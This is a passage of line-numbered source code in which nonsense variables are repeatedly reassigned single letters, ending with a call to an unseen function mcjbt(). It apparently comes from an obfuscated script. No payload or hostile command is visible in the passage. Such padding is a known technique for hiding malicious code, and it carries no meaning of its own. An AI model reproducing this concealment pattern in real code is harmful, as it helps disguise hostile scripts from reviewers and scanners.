1521 | ryhwvcmt = "x"; | |
1522 | ryhwvcmt = "l"; | |
1523 | ryhwvcmt = "G"; | |
1524 | ryhwvcmt = "n"; | |
1525 | ryhwvcmt = "y"; | |
1526 | ryhwvcmt = "N"; | |
1527 | ryhwvcmt = "w"; | |
1528 | ryhwvcmt = "E"; | |
1529 | ryhwvcmt = "a"; | |
1530 | ryhwvcmt = "u"; | |
1531 | ryhwvcmt = "K"; | |
1532 | ryhwvcmt = "j"; | |
1533 | ryhwvcmt = "R"; | |
1534 | ntkuf = "K"; | |
1535 | ntkuf = "e"; | |
1536 | ntkuf = "Q"; | |
1537 | ntkuf = "d"; | |
1538 | ntkuf = "L"; | |
1539 | ntkuf = "R"; | |
1540 | ntkuf = "k"; | |
1541 | ntkuf = "p"; | |
1542 | ntkuf = "A"; | |
1543 | ntkuf = "c"; | |
1544 | ntkuf = "L"; | |
1545 | ntkuf = "P"; | |
1546 | ntkuf = "H"; | |
1547 | ntkuf = "W"; | |
1548 | ntkuf = "X"; | |
1549 | ntkuf = "J"; | |
1550 | ntkuf = "d"; | |
1551 | ntkuf = "e"; | |
1552 | ntkuf = "J"; | |
1553 | ntkuf = "h"; | |
1554 | ntkuf = "Q"; | |
1555 | ntkuf = "G"; | |
1556 | ntkuf = "z"; | |
1557 | ntkuf = "I"; | |
1558 | ntkuf = "i"; | |
1559 | ntkuf = "f"; | |
1560 | ntkuf = "o"; | |
1561 | ntkuf = "U"; | |
1562 | ntkuf = "s"; | |
1563 | rdmcen = "U"; | |
1564 | rdmcen = "d"; | |
1565 | rdmcen = "q"; | |
1566 | rdmcen = "W"; | |
1567 | rdmcen = "%"; | |
1568 | ywpxby = "T"; | |
1569 | ywpxby = "o"; | |
1570 | ywpxby = "f"; | |
1571 | ywpxby = "n"; | |
1572 | ywpxby = "a"; | |
1573 | ywpxby = "z"; | |
1574 | ywpxby = "F"; | |
1575 | ywpxby = "Y"; | |
1576 | ywpxby = "C"; | |
1577 | ywpxby = "F"; | |
1578 | ywpxby = "y"; | |
1579 | ywpxby = "K"; | |
1580 | ywpxby = "i"; | |
1581 | ywpxby = "j"; | |
1582 | ywpxby = "K"; | |
1583 | ywpxby = "c"; | |
1584 | ywpxby = "s"; | |
1585 | ywpxby = "h"; | |
1586 | ywpxby = "f"; | |
1587 | ywpxby = "p"; | |
1588 | ywpxby = "f"; | |
1589 | ywpxby = "G"; | |
1590 | ywpxby = "i"; | |
1591 | ywpxby = "a"; | |
1592 | ywpxby = "S"; | |
1593 | ywpxby = "b"; | |
1594 | ywpxby = "M"; | |
1595 | ywpxby = "p"; | |
1596 | ywpxby = "N"; | |
1597 | ywpxby = "F"; | |
1598 | ywpxby = "f"; | |
1599 | ywpxby = "T"; | |
1600 | ywpxby = "Q"; | |
1601 | ywpxby = "c"; | |
1602 | ywpxby = "n"; | |
1603 | ywpxby = "Z"; | |
1604 | ywpxby = "E"; | |
1605 | ywpxby = "j"; | |
1606 | ywpxby = "z"; | |
1607 | ywpxby = "f"; | |
1608 | mcjbt ( ); |
|